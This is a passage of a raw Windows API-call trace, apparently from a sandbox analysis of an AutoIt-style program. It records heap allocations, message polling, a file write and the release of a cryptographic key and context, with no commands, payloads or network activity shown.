(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0239.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2a768 | out: hHeap=0x970000) returned 1 [0239.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0239.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0239.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f48) returned 0x2f14818 [0239.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed8070 | out: hHeap=0x970000) returned 1 [0239.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0239.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0239.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0239.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0239.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0239.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0239.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0239.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0239.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0239.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f48) returned 0x2f2a768 [0239.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.276] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f2a768*, nNumberOfBytesToWrite=0x15f48, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f2a768*, lpNumberOfBytesWritten=0x8cf5e4*=0x15f48, lpOverlapped=0x0) returned 1 [0239.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0239.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2a768 | out: hHeap=0x970000) returned 1 [0239.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0239.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0239.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0239.281] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0239.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0239.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0239.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0239.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0239.281] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0239.282] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0239.282] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0239.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0239.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0239.283] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0239.283] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0239.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0239.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0239.283] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0239.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0239.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0239.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0239.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0239.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0239.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0239.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e511d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0239.283] CryptDestroyKey (hKey=0xa87290) returned 1 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0239.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0239.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0239.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0239.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0239.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0239.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0239.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0239.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0239.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0239.285] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0239.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0239.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0239.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0239.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0239.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0239.285] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0239.285] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0239.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0239.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.285] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0239.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0239.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0239.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0239.286] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0239.286] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0239.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0239.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0239.286] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0239.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0239.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0239.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.286] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0239.286] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0239.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0239.286] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0239.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0239.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0239.286] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0239.286] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0239.286] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.286] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0239.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0239.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.287] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0239.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0239.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0239.287] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0239.287] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0239.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0239.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0239.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.287] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0239.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0239.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0239.287] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0239.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0239.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0239.287] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0239.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0239.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0239.288] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0239.288] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0239.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0239.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0239.288] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0239.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0239.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0239.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69888, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0239.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0239.288] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0239.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0239.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0239.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0239.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0239.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0239.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0239.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0239.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0239.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0239.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0239.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0239.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0239.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0239.290] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0239.290] RtlAllocateHeap (HeapHandle=0x970000, 